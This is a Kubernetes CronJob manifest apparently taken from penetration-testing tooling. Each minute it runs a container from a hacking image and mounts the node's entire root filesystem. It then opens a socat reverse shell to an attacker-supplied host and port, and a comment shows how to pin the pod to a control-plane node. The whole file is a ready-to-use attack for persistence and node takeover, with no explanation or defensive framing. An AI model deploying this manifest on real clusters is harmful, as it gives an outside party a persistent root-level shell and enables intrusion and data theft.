apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: hostpath-revshell-cronjob
  labels:
    app: pentest
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hostpath-revshell-cronjob
            image: beserkerbob/hackingcontainerkubernetes:0.2
            volumeMounts:
            - mountPath: /host
              name: noderoot
            command: [ "/bin/bash", "-c", "--" ]
            args: [ "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$host:$port"]
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          volumes:
          - name: noderoot
            hostPath:
              path: /
          restartPolicy: OnFailure
